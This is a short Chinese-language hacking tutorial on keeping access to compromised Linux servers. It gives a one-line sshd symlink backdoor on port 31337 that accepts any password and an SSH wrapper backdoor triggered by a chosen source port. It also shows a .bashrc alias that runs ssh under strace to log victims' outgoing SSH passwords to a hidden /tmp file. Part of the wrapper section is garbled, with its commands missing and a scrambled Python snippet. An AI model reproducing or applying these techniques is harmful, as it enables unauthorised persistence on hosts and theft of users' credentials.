1.入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口
肉鸡上执行1
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。
2.做一个SSH wrapper后门,效果比第一个好,没有开放额外的端口,只要对方开了SSH服务,就能远程连接
在肉鸡上执行:1
2
3
4
5
6
7[root@localhost ~]
[root@localhost sbin]
[root@localhost sbin]
[root@localhost sbin]
[root@localhost sbin]
[root@localhost sbin]
[root@localhost sbin]
在本机执行:1
socat STDIO TCP4:10.18.180.20:22,sourceport=13377
如果你想修改源端口,可以用python的struct标准库实现1
2
3
4
5
6
7import struct
'>I6',19526) buffer = struct.pack(
print repr(buffer)
'\x00\x00LF'
'>I6',13377) buffer = struct.pack(
print buffer
4A
3. 记录SSH客户端连接密码
搞定主机后,往往想记录肉鸡SSH连接到其他主机的密码,进一步扩大战果,使用strace命令就行了。
在肉鸡上修改要记录密码用户目录的.bashrc,添加一行:1
alias ssh='strace -o /tmp/.sshpwd-`date '+%d%h%m%s'`.log -e read.write.connect -s 2048 ssh'
之后查看tmp目录的记录:1
grep "read(5" /tmp/.sshpwdxxxxxxxx.log